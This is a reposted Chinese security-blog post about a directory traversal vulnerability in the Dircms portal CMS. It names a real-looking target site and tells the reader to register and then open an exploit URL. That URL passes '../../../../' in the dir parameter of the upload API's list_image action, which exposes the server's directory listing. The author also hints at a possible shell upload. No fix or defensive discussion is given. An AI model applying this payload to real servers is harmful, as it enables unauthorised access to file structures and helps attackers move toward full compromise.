Dircms门户系统遍历目录漏洞

admin 2021年4月3日19:33:38评论37 views字数 471阅读1分34秒阅读模式

今天在A5找到 dircms,商业版那个叫贵吖,又不安全,不知道是不是就一个程序员,一个客服的小公司。

挖到一个遍历目录

貌似还有地方可以拿shell晚上回家测试

刚刚百度,乌云貌似是12号有提交

不过还没有公开所以不算抄袭。

地址:http://www.wooyun.org/bugs/wooyun-2010-09537

测试网站:http://www.tengzhou0632.com

先注册会员

然后打开EXP:http://madman.in/api/upload/index.php?action=list_image&objid=image_api_image&dir=9d4c2f636f067f89../../../../

然后目录就全部爆出来了,喜欢的自己下载源码去研究。有免费版的。

下载地址:http://down.chinaz.com/soft/27402.htm

留言评论(旧系统):

sa @ 2012-07-21 11:54:05

不愧是dircms……dir…… - -

本站回复:

-_-|||

文章来源于lcx.cc:Dircms门户系统遍历目录漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:33:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Dircms门户系统遍历目录漏洞https://cn-sec.com/archives/323529.html

发表评论

匿名网友 填写信息